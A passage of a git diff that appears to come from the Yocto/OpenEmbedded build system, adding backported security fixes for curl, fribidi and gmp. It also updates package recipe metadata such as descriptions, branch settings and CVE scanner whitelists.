+-          if(!co->version) {
+-            badcookie = TRUE;
+-            break;
+-          }
++          /* just ignore */
+         }
+         else if(strcasecompare("max-age", name)) {
+           /* Defined in RFC2109:
+@@ -1042,7 +1037,6 @@ Curl_cookie_add(struct Curl_easy *data,
+         free(clist->path);
+         free(clist->spath);
+         free(clist->expirestr);
+-        free(clist->version);
+         free(clist->maxage);
+ 
+         *clist = *co;  /* then store all the new data */
+@@ -1111,9 +1105,6 @@ struct CookieInfo *Curl_cookie_init(struct Curl_easy *data,
+     c = calloc(1, sizeof(struct CookieInfo));
+     if(!c)
+       return NULL; /* failed to get memory */
+-    c->filename = strdup(file?file:"none"); /* copy the name just in case */
+-    if(!c->filename)
+-      goto fail; /* failed to get memory */
+   }
+   else {
+     /* we got an already existing one, use that */
+@@ -1241,7 +1232,6 @@ static struct Cookie *dup_cookie(struct Cookie *src)
+     CLONE(name);
+     CLONE(value);
+     CLONE(maxage);
+-    CLONE(version);
+     d->expires = src->expires;
+     d->tailmatch = src->tailmatch;
+     d->secure = src->secure;
+@@ -1457,7 +1447,6 @@ void Curl_cookie_cleanup(struct CookieInfo *c)
+ {
+   if(c) {
+     unsigned int i;
+-    free(c->filename);
+     for(i = 0; i < COOKIE_HASH_SIZE; i++)
+       Curl_cookie_freelist(c->cookies[i]);
+     free(c); /* free the base struct as well */
+diff --git a/lib/cookie.h b/lib/cookie.h
+index b3865e601..2e667cda0 100644
+--- a/lib/cookie.h
++++ b/lib/cookie.h
+@@ -36,8 +36,6 @@ struct Cookie {
+   char *expirestr;   /* the plain text version */
+   bool tailmatch;    /* whether we do tail-matching of the domain name */
+ 
+-  /* RFC 2109 keywords. Version=1 means 2109-compliant cookie sending */
+-  char *version;     /* Version = <value> */
+   char *maxage;      /* Max-Age = <value> */
+ 
+   bool secure;       /* whether the 'secure' keyword was used */
+@@ -54,15 +52,14 @@ struct Cookie {
+ #define COOKIE_PREFIX__SECURE (1<<0)
+ #define COOKIE_PREFIX__HOST (1<<1)
+ 
+-#define COOKIE_HASH_SIZE 256
++#define COOKIE_HASH_SIZE 63
+ 
+ struct CookieInfo {
+   /* linked list of cookies we know of */
+   struct Cookie *cookies[COOKIE_HASH_SIZE];
+ 
+-  char *filename;  /* file we read from/write to */
+   bool running;    /* state info, for cookie adding information */
+-  long numcookies; /* number of cookies in the "jar" */
++  int numcookies;  /* number of cookies in the "jar" */
+   bool newsession; /* new session, discard session cookies on load */
+   int lastct;      /* last creation-time used in the jar */
+ };
+diff --git a/lib/easy.c b/lib/easy.c
+index b648e80c1..cdca0fb03 100644
+--- a/lib/easy.c
++++ b/lib/easy.c
+@@ -840,9 +840,7 @@ struct Curl_easy *curl_easy_duphandle(struct Curl_easy *data)
+   if(data->cookies) {
+     /* If cookies are enabled in the parent handle, we enable them
+        in the clone as well! */
+-    outcurl->cookies = Curl_cookie_init(data,
+-                                        data->cookies->filename,
+-                                        outcurl->cookies,
++    outcurl->cookies = Curl_cookie_init(data, NULL, outcurl->cookies,
+                                         data->set.cookiesession);
+     if(!outcurl->cookies)
+       goto fail;
+-- 
+2.39.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-46218.patch b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
new file mode 100644
index 0000000000..c9677b6a84
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
@@ -0,0 +1,52 @@
+CVE: CVE-2023-46218
+Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.68.0-1ubuntu2.21.debian.tar.xz  upstream https://github.com/curl/curl/commit/2b0994c29a721c91c57  ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 2b0994c29a721c91c572cff7808c572a24d251eb Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 23 Nov 2023 08:15:47 +0100
+Subject: [PATCH] cookie: lowercase the domain names before PSL checks
+
+Reported-by: Harry Sintonen
+
+Closes #12387
+---
+ lib/cookie.c | 24 ++++++++++++++++--------
+ 1 file changed, 16 insertions(+), 8 deletions(-)
+
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -967,15 +967,23 @@ Curl_cookie_add(struct Curl_easy *data,
+ #ifdef USE_LIBPSL
+   /* Check if the domain is a Public Suffix and if yes, ignore the cookie. */
+   if(domain && co->domain && !isip(co->domain)) {
+-    const psl_ctx_t *psl = Curl_psl_use(data);
+-    int acceptable;
+-
+-    if(psl) {
+-      acceptable = psl_is_cookie_domain_acceptable(psl, domain, co->domain);
+-      Curl_psl_release(data);
++    bool acceptable = FALSE;
++    char lcase[256];
++    char lcookie[256];
++    size_t dlen = strlen(domain);
++    size_t clen = strlen(co->domain);
++    if((dlen < sizeof(lcase)) && (clen < sizeof(lcookie))) {
++      const psl_ctx_t *psl = Curl_psl_use(data);
++      if(psl) {
++        /* the PSL check requires lowercase domain name and pattern */
++        Curl_strntolower(lcase, domain, dlen + 1);
++        Curl_strntolower(lcookie, co->domain, clen + 1);
++        acceptable = psl_is_cookie_domain_acceptable(psl, lcase, lcookie);
++        Curl_psl_release(data);
++      }
++      else
++        acceptable = !bad_domain(domain);
+     }
+-    else
+-      acceptable = !bad_domain(domain);
+ 
+     if(!acceptable) {
+       infof(data, "cookie '%s' dropped, domain '%s' must not "
diff --git a/meta/recipes-support/curl/curl/CVE-2024-2398.patch b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
new file mode 100644
index 0000000000..a3840336f0
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
@@ -0,0 +1,88 @@
+Backport of:
+
+From deca8039991886a559b67bcd6701db800a5cf764 Mon Sep 17 00:00:00 2001
+From: Stefan Eissing <stefan@eissing.org>
+Date: Wed, 6 Mar 2024 09:36:08 +0100
+Subject: [PATCH] http2: push headers better cleanup
+
+- provide common cleanup method for push headers
+
+Closes #13054
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2024-2398.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/deca8039991886a559b67bcd6701db800a5cf764]
+CVE: CVE-2024-2398
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/http2.c | 34 +++++++++++++++-------------------
+ 1 file changed, 15 insertions(+), 19 deletions(-)
+
+--- a/lib/http2.c
++++ b/lib/http2.c
+@@ -515,6 +515,15 @@ static struct Curl_easy *duphandle(struc
+ }
+ 
+ 
++static void free_push_headers(struct HTTP *stream)
++{
++  size_t i;
++  for(i = 0; i<stream->push_headers_used; i++)
++    free(stream->push_headers[i]);
++  Curl_safefree(stream->push_headers);
++  stream->push_headers_used = 0;
++}
++
+ static int push_promise(struct Curl_easy *data,
+                         struct connectdata *conn,
+                         const nghttp2_push_promise *frame)
+@@ -528,7 +537,6 @@ static int push_promise(struct Curl_easy
+     struct curl_pushheaders heads;
+     CURLMcode rc;
+     struct http_conn *httpc;
+-    size_t i;
+     /* clone the parent */
+     struct Curl_easy *newhandle = duphandle(data);
+     if(!newhandle) {
+@@ -557,11 +565,7 @@ static int push_promise(struct Curl_easy
+     Curl_set_in_callback(data, false);
+ 
+     /* free the headers again */
+-    for(i = 0; i<stream->push_headers_used; i++)
+-      free(stream->push_headers[i]);
+-    free(stream->push_headers);
+-    stream->push_headers = NULL;
+-    stream->push_headers_used = 0;
++    free_push_headers(stream);
+ 
+     if(rv) {
+       /* denied, kill off the new handle again */
+@@ -995,10 +999,10 @@ static int on_header(nghttp2_session *se
+             stream->push_headers_alloc) {
+       char **headp;
+       stream->push_headers_alloc *= 2;
+-      headp = Curl_saferealloc(stream->push_headers,
+-                               stream->push_headers_alloc * sizeof(char *));
++      headp = realloc(stream->push_headers,
++                      stream->push_headers_alloc * sizeof(char *));
+       if(!headp) {
+-        stream->push_headers = NULL;
++        free_push_headers(stream);
+         return NGHTTP2_ERR_TEMPORAL_CALLBACK_FAILURE;
+       }
+       stream->push_headers = headp;
+@@ -1179,14 +1183,7 @@ void Curl_http2_done(struct Curl_easy *d
+   if(http->header_recvbuf) {
+     Curl_add_buffer_free(&http->header_recvbuf);
+     Curl_add_buffer_free(&http->trailer_recvbuf);
+-    if(http->push_headers) {
+-      /* if they weren't used and then freed before */
+-      for(; http->push_headers_used > 0; --http->push_headers_used) {
+-        free(http->push_headers[http->push_headers_used - 1]);
+-      }
+-      free(http->push_headers);
+-      http->push_headers = NULL;
+-    }
++    free_push_headers(http);
+   }
+ 
+   if(!httpc->h2) /* not HTTP/2 ? */
diff --git a/meta/recipes-support/curl/curl_7.69.1.bb b/meta/recipes-support/curl/curl_7.69.1.bb
index 239852db09..2f351d585a 100644
--- a/meta/recipes-support/curl/curl_7.69.1.bb
+++ b/meta/recipes-support/curl/curl_7.69.1.bb
@@ -1,4 +1,8 @@
 SUMMARY = "Command line tool and library for client-side URL transfers"
+DESCRIPTION = "It uses URL syntax to transfer data to and from servers. \
+curl is a widely used because of its ability to be flexible and complete \
+complex tasks. For example, you can use curl for things like user authentication, \
+HTTP post, SSL connections, proxy support, FTP uploads, and more!"
 HOMEPAGE = "http://curl.haxx.se/"
 BUGTRACKER = "http://curl.haxx.se/mail/list.cgi?list=curl-tracker"
 SECTION = "console/network"
@@ -9,6 +13,52 @@ SRC_URI = "https://curl.haxx.se/download/curl-${PV}.tar.bz2 \
            file://0001-replace-krb5-config-with-pkg-config.patch \
            file://CVE-2020-8169.patch \
            file://CVE-2020-8177.patch \
+           file://CVE-2020-8231.patch \
+           file://CVE-2020-8284.patch \
+           file://CVE-2020-8285.patch \
+           file://CVE-2020-8286.patch \
+           file://CVE-2021-22876.patch \
+           file://CVE-2021-22890.patch \
+           file://CVE-2021-22898.patch \
+           file://CVE-2021-22924.patch \
+           file://CVE-2021-22925.patch \
+           file://CVE-2021-22946-pre1.patch \
+           file://CVE-2021-22946.patch \
+           file://CVE-2021-22947.patch \
+           file://CVE-2022-27776.patch \
+           file://CVE-2022-27775.patch \
+           file://CVE-2022-22576.patch \
+           file://CVE-2022-27774-1.patch \
+           file://CVE-2022-27774-2.patch \
+           file://CVE-2022-27774-3.patch \
+           file://CVE-2022-27774-4.patch \
+           file://CVE-2022-27781.patch \
+           file://CVE-2022-27782-1.patch \
+           file://CVE-2022-27782-2.patch \
+           file://CVE-2022-32206.patch \
+           file://CVE-2022-32207.patch \
+           file://CVE-2022-32208.patch \
+           file://CVE-2022-35252.patch \
+           file://CVE-2022-32221.patch \
+           file://CVE-2022-35260.patch \
+           file://CVE-2022-43552.patch \
+           file://CVE-2023-23916.patch \
+           file://CVE-2023-27534-pre1.patch \
+           file://CVE-2023-27534.patch \
+           file://CVE-2023-27538.patch \
+           file://CVE-2023-27533.patch \
+           file://CVE-2023-27535-pre1.patch \
+           file://CVE-2023-27535.patch \
+           file://CVE-2023-27536.patch \
+           file://CVE-2023-28320.patch \
+           file://CVE-2023-28320-fol1.patch \
+           file://CVE-2023-32001.patch \
+           file://CVE-2023-38545.patch \
+           file://CVE-2023-38546.patch \
+           file://CVE-2023-28321.patch \
+           file://CVE-2023-28322.patch \
+           file://CVE-2023-46218.patch \
+           file://CVE-2024-2398.patch \
 "
 
 SRC_URI[md5sum] = "ec5fc263f898a3dfef08e805f1ecca42"
@@ -16,6 +66,15 @@ SRC_URI[sha256sum] = "2ff5e5bd507adf6aa88ff4bbafd4c7af464867ffb688be93b9930717a5
 
 # Curl has used many names over the years...
 CVE_PRODUCT = "haxx:curl haxx:libcurl curl:curl curl:libcurl libcurl:libcurl daniel_stenberg:curl"
+CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926 CVE-2021-22945"
+
+# As per link https://security-tracker.debian.org/tracker/CVE-2021-22897
+# and https://ubuntu.com/security/CVE-2021-22897
+# This CVE issue affects Windows only Hence whitelisting this CVE
+CVE_CHECK_WHITELIST += "CVE-2021-22897"
+
+# This CVE reports that apple had to upgrade curl because of other already reported CVEs
+CVE_CHECK_WHITELIST += "CVE-2023-42915"
 
 inherit autotools pkgconfig binconfig multilib_header
 
diff --git a/meta/recipes-support/db/db_5.3.28.bb b/meta/recipes-support/db/db_5.3.28.bb
index 318efcb61d..b2ae98f05c 100644
--- a/meta/recipes-support/db/db_5.3.28.bb
+++ b/meta/recipes-support/db/db_5.3.28.bb
@@ -10,11 +10,12 @@
 # same system at the same time if really necessary.
 SECTION = "libs"
 SUMMARY = "Berkeley Database v5"
+DESCRIPTION = "Provides the foundational storage services for your application, no matter how demanding and unique your requirements may seem to be"
 HOMEPAGE = "https://www.oracle.com/database/technologies/related/berkeleydb.html"
 LICENSE = "Sleepycat"
 RCONFLICTS_${PN} = "db3"
 
-CVE_PRODUCT = "oracle_berkeley_db"
+CVE_PRODUCT = "oracle_berkeley_db berkeley_db"
 CVE_VERSION = "11.2.${PV}"
 
 PR = "r1"
diff --git a/meta/recipes-support/debianutils/debianutils_4.9.1.bb b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
index 904c52780f..8603fecbd0 100644
--- a/meta/recipes-support/debianutils/debianutils_4.9.1.bb
+++ b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
@@ -1,4 +1,9 @@
 SUMMARY = "Miscellaneous utilities specific to Debian"
+DESCRIPTION = "Provides a number of small utilities which are used \
+primarily by the installation scripts of Debian packages, although \
+you may use them directly. "
+HOMEPAGE = "https://packages.debian.org/sid/debianutils"
+BUGTRACKER = "https://bugs.debian.org/cgi-bin/pkgreport.cgi?pkg=debianutils;dist=unstable"
 SECTION = "base"
 LICENSE = "GPLv2 & SMAIL_GPL"
 LIC_FILES_CHKSUM = "file://debian/copyright;md5=f01a5203d50512fc4830b4332b696a9f"
diff --git a/meta/recipes-support/diffoscope/diffoscope_136.bb b/meta/recipes-support/diffoscope/diffoscope_172.bb
index 3e3e1dfc00..b26713c47f 100644
--- a/meta/recipes-support/diffoscope/diffoscope_136.bb
+++ b/meta/recipes-support/diffoscope/diffoscope_172.bb
@@ -7,12 +7,19 @@ PYPI_PACKAGE = "diffoscope"
 
 inherit pypi setuptools3
 
-SRC_URI[md5sum] = "c84d8d308a40176ba2f5dc4abdbf6f73"
-SRC_URI[sha256sum] = "0d6486d6eb6e0445ba21fee2e8bdd3a366ce786bfac98e00e5a95038b7815f15"
+SRC_URI[sha256sum] = "5ffe7f38555c6409bc7e7edc277ed77dd78641fe1306fc38d153dbbe445ddea4"
 
 RDEPENDS_${PN} += "binutils vim squashfs-tools python3-libarchive-c python3-magic"
 
 # Dependencies don't build for musl
 COMPATIBLE_HOST_libc-musl = 'null'
 
+do_install_append_class-native() {
+	create_wrapper ${D}${bindir}/diffoscope \
+		MAGIC=${STAGING_DIR_NATIVE}${datadir_native}/misc/magic.mgc \
+		RPM_CONFIGDIR=${STAGING_LIBDIR_NATIVE}/rpm \
+		LD_LIBRARY_PATH=${STAGING_LIBDIR_NATIVE} \
+		RPM_ETCCONFIGDIR=${STAGING_DIR_NATIVE}
+}
+
 BBCLASSEXTEND = "native"
diff --git a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
index 1623285fd0..ea34e4c7a3 100644
--- a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
+++ b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
@@ -8,7 +8,7 @@ SECTION = "support"
 LICENSE = "BSD-2-Clause"
 LIC_FILES_CHKSUM = "file://COPYING.txt;md5=0c977b18f0a384d03597a517d7d03e32"
 
-SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix"
+SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix;branch=master"
 UPSTREAM_CHECK_GITTAGREGEX = "dos2unix-(?P<pver>(\d+(\.\d+)+))"
 
 SRCREV = "0490f0723b1a0851b17343f6164915f3474b5197"
diff --git a/meta/recipes-support/enchant/enchant2_2.2.8.bb b/meta/recipes-support/enchant/enchant2_2.2.8.bb
index 4ddbe55da5..7c624efea3 100644
--- a/meta/recipes-support/enchant/enchant2_2.2.8.bb
+++ b/meta/recipes-support/enchant/enchant2_2.2.8.bb
@@ -1,6 +1,9 @@
 SUMMARY = "Enchant Spell checker API Library"
+DESCRIPTION = "A library (and command-line program) that wraps a number of \
+different spelling libraries and programs with a consistent interface."
 SECTION = "libs"
 HOMEPAGE = "https://abiword.github.io/enchant/"
+BUGTRACKER = "https://github.com/AbiWord/enchant/issues/"
 LICENSE = "LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=a916467b91076e631dd8edb7424769c7"
 
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
new file mode 100644
index 0000000000..8f2c2ade0e
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
@@ -0,0 +1,50 @@
+From ad3a19e6372b1e667128ed1ea2f49919884587e1 Mon Sep 17 00:00:00 2001
+From: Akira TAGOH <akira@tagoh.org>
+Date: Thu, 17 Feb 2022 17:30:12 +0900
+Subject: [PATCH] Fix the stack buffer overflow issue
+
+strlen() could returns 0. Without a conditional check for len,
+accessing S_ pointer with len - 1 may causes a stack buffer overflow.
+
+AddressSanitizer reports this like:
+==1219243==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdce043c1f at pc 0x000000403547 bp 0x7ffdce0
+43b30 sp 0x7ffdce043b28
+READ of size 1 at 0x7ffdce043c1f thread T0
+    #0 0x403546 in main ../bin/fribidi-main.c:393
+    #1 0x7f226804e58f in __libc_start_call_main (/lib64/libc.so.6+0x2d58f)
+    #2 0x7f226804e648 in __libc_start_main_impl (/lib64/libc.so.6+0x2d648)
+    #3 0x4036f4 in _start (/tmp/fribidi/build/bin/fribidi+0x4036f4)
+
+Address 0x7ffdce043c1f is located in stack of thread T0 at offset 63 in frame
+    #0 0x4022bf in main ../bin/fribidi-main.c:193
+
+  This frame has 5 object(s):
+    [32, 36) 'option_index' (line 233)
+    [48, 52) 'base' (line 386)
+    [64, 65064) 'S_' (line 375) <== Memory access at offset 63 underflows this variable
+    [65328, 130328) 'outstring' (line 385)
+    [130592, 390592) 'logical' (line 384)
+
+This fixes https://github.com/fribidi/fribidi/issues/181
+
+CVE: CVE-2022-25308
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/ad3a19e6372b1e667128ed1ea2f49919884587e1]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ bin/fribidi-main.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/bin/fribidi-main.c b/bin/fribidi-main.c
+index 3cf9fe1..3ae4fb6 100644
+--- a/bin/fribidi-main.c
++++ b/bin/fribidi-main.c
+@@ -390,7 +390,7 @@ FRIBIDI_END_IGNORE_DEPRECATIONS
+ 	    S_[sizeof (S_) - 1] = 0;
+ 	    len = strlen (S_);
+ 	    /* chop */
+-	    if (S_[len - 1] == '\n')
++	    if (len > 0 && S_[len - 1] == '\n')
+ 	      {
+ 		len--;
+ 		S_[len] = '\0';
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
new file mode 100644
index 0000000000..0efba3d05c
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
@@ -0,0 +1,31 @@
+From f22593b82b5d1668d1997dbccd10a9c31ffea3b3 Mon Sep 17 00:00:00 2001
+From: Dov Grobgeld <dov.grobgeld@gmail.com>
+Date: Fri, 25 Mar 2022 09:09:49 +0300
+Subject: [PATCH] Protected against garbage in the CapRTL encoder
+
+CVE: CVE-2022-25309
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/f22593b82b5d1668d1997dbccd10a9c31ffea3b3]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ lib/fribidi-char-sets-cap-rtl.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/fribidi-char-sets-cap-rtl.c b/lib/fribidi-char-sets-cap-rtl.c
+index b0c0e4a..f74e010 100644
+--- a/lib/fribidi-char-sets-cap-rtl.c
++++ b/lib/fribidi-char-sets-cap-rtl.c
+@@ -232,7 +232,12 @@ fribidi_cap_rtl_to_unicode (
+ 	    }
+ 	}
+       else
+-	us[j++] = caprtl_to_unicode[(int) s[i]];
++      {
++        if ((int)s[i] < 0)
++          us[j++] = '?';
++        else
++          us[j++] = caprtl_to_unicode[(int) s[i]];
++      }
+     }
+ 
+   return j;
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
new file mode 100644
index 0000000000..d79a82d648
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
@@ -0,0 +1,30 @@
+From 175850b03e1af251d705c1d04b2b9b3c1c06e48f Mon Sep 17 00:00:00 2001
+From: Akira TAGOH <akira@tagoh.org>
+Date: Thu, 17 Feb 2022 19:06:10 +0900
+Subject: [PATCH] Fix SEGV issue in fribidi_remove_bidi_marks
+
+Escape from fribidi_remove_bidi_marks() immediately if str is null.
+
+This fixes https://github.com/fribidi/fribidi/issues/183
+
+CVE: CVE-2022-25310
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/175850b03e1af251d705c1d04b2b9b3c1c06e48f]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ lib/fribidi.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/fribidi.c b/lib/fribidi.c
+index f5da0da..70bdab2 100644
+--- a/lib/fribidi.c
++++ b/lib/fribidi.c
+@@ -74,7 +74,7 @@ fribidi_remove_bidi_marks (
+   fribidi_boolean status = false;
+ 
+   if UNLIKELY
+-    (len == 0)
++    (len == 0 || str == NULL)
+     {
+       status = true;
+       goto out;
diff --git a/meta/recipes-support/fribidi/fribidi_1.0.9.bb b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
index 0654b07dc7..62b7d72812 100644
--- a/meta/recipes-support/fribidi/fribidi_1.0.9.bb
+++ b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
@@ -1,9 +1,18 @@
 SUMMARY = "Free Implementation of the Unicode Bidirectional Algorithm"
+DESCRIPTION = "It provides utility functions to aid in the development \
+of interactive editors and widgets that implement BiDi functionality. \
+The BiDi algorithm is a prerequisite for supporting right-to-left scripts such \
+as Hebrew, Arabic, Syriac, and Thaana. "
 SECTION = "libs"
+HOMEPAGE = "http://fribidi.org/"
+BUGTRACKER = "https://github.com/fribidi/fribidi/issues"
 LICENSE = "LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"
 
 SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/v${PV}/${BP}.tar.xz \
+           file://CVE-2022-25308.patch \
+           file://CVE-2022-25309.patch \
+           file://CVE-2022-25310.patch \
            "
 SRC_URI[md5sum] = "1b767c259c3cd8e0c8496970f63c22dc"
 SRC_URI[sha256sum] = "c5e47ea9026fb60da1944da9888b4e0a18854a0e2410bbfe7ad90a054d36e0c7"
diff --git a/meta/recipes-support/gdbm/gdbm_1.18.1.bb b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
index fbb1fe72d7..bfc9ee8f85 100644
--- a/meta/recipes-support/gdbm/gdbm_1.18.1.bb
+++ b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Key/value database library with extensible hashing"
+DESCRIPTION = "Library of database functions that use extensible hashing \
+and work similar to the standard UNIX dbm. These routines are provided \
+to a programmer needing to create and manipulate a hashed database."
 HOMEPAGE = "http://www.gnu.org/software/gdbm/"
 SECTION = "libs"
 LICENSE = "GPLv3"
diff --git a/meta/recipes-support/gmp/gmp/cve-2021-43618.patch b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
new file mode 100644
index 0000000000..095fb21eaa
--- /dev/null
+++ b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
@@ -0,0 +1,27 @@
+CVE: CVE-2021-43618
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+# HG changeset patch
+# User Marco Bodrato <bodrato@mail.dm.unipi.it>
+# Date 1634836009 -7200
+# Node ID 561a9c25298e17bb01896801ff353546c6923dbd
+# Parent  e1fd9db13b475209a864577237ea4b9105b3e96e
+mpz/inp_raw.c: Avoid bit size overflows
+
+diff -r e1fd9db13b47 -r 561a9c25298e mpz/inp_raw.c
+--- a/mpz/inp_raw.c	Tue Dec 22 23:49:51 2020 +0100
++++ b/mpz/inp_raw.c	Thu Oct 21 19:06:49 2021 +0200
+@@ -88,8 +88,11 @@
+ 
+   abs_csize = ABS (csize);
+ 
++  if (UNLIKELY (abs_csize > ~(mp_bitcnt_t) 0 / 8))
++    return 0; /* Bit size overflows */
++
+   /* round up to a multiple of limbs */
+-  abs_xsize = BITS_TO_LIMBS (abs_csize*8);
++  abs_xsize = BITS_TO_LIMBS ((mp_bitcnt_t) abs_csize * 8);
+ 
+   if (abs_xsize != 0)
+     {
diff --git a/meta/recipes-support/gmp/gmp_6.2.0.bb b/meta/recipes-support/gmp/gmp_6.2.0.bb
index a19c74fca8..d29b74f829 100644
--- a/meta/recipes-support/gmp/gmp_6.2.0.bb
+++ b/meta/recipes-support/gmp/gmp_6.2.0.bb
@@ -12,6 +12,7 @@ SRC_URI = "https://gmplib.org/download/${BPN}/${BP}${REVISION}.tar.bz2 \
            file://use-includedir.patch \
            file://0001-Append-the-user-provided-flags-to-the-auto-detected-.patch \
            file://0001-confiure.ac-Believe-the-cflags-from-environment.patch \
+           file://cve-2021-43618.patch \
            "
 SRC_URI[md5sum] = "c24161e0dd44cae78cd5f67193492a21"
 SRC_URI[sha256sum] = "f51c99cb114deb21a60075ffb494c1a210eb9d7cb729ed042ddb7de9534451ea"
diff --git a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
index 0defebeb15..19f32e8d1f 100644
--- a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
+++ b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
@@ -1,11 +1,15 @@
 SUMMARY = "Test runner for GNOME-style installed tests"
+DESCRIPTION = "Runner provides an execution harness for GNOME installed tests. \
+These tests are useful for verifying the functionality of software as \
+installed and packaged, and complement rather than replace build-time \
+('make check') tests."
 HOMEPAGE = "https://wiki.gnome.org/GnomeGoals/InstalledTests"
 LICENSE = "LGPLv2+"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=3bf50002aefd002f49e7bb854063f7e7 \
                     file://src/gnome-desktop-testing-runner.c;beginline=1;endline=20;md5=7ef3ad9da2ffcf7707dc11151fe007f4"
 
-SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http"
+SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http;branch=master"
 SRCREV = "4decade67b29ad170fcf3de148e41695fc459f48"
 
 DEPENDS = "glib-2.0"
diff --git a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
index 2c204e0245..a0af2d48dc 100644
--- a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
+++ b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
@@ -1,4 +1,4 @@
-From e7ad11cf54475e455fdb84d118e4782961698567 Mon Sep 17 00:00:00 2001
+From abc5c396aaddaef2e6811362e3e0cc0da28c2b34 Mon Sep 17 00:00:00 2001
 From: Alexander Kanavin <alex.kanavin@gmail.com>
 Date: Mon, 22 Jan 2018 18:00:21 +0200
 Subject: [PATCH] configure.ac: use a custom value for the location of
@@ -14,10 +14,10 @@ Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
  1 file changed, 1 insertion(+), 1 deletion(-)
 
 diff --git a/configure.ac b/configure.ac
-index 919ab31..cd58fdb 100644
+index 64cb8c6..3fe9027 100644
 --- a/configure.ac
 +++ b/configure.ac
-@@ -1855,7 +1855,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf",
+@@ -1824,7 +1824,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf",
  
  AC_DEFINE_UNQUOTED(GPGTAR_NAME, "gpgtar", [The name of the gpgtar tool])
  
diff --git a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
index 3e798efd06..a13b4d5fb5 100644
--- a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
+++ b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
@@ -1,7 +1,7 @@
-From 9c3858ffda6246bf9e1e6aeeb920532a56b19408 Mon Sep 17 00:00:00 2001
+From 6c75656b68cb6e38b039ae532bd39437cd6daec5 Mon Sep 17 00:00:00 2001
 From: Saul Wold <sgw@linux.intel.com>
 Date: Wed, 16 Aug 2017 11:18:01 +0800
-Subject: [PATCH 3/4] dirmngr uses libgpg error
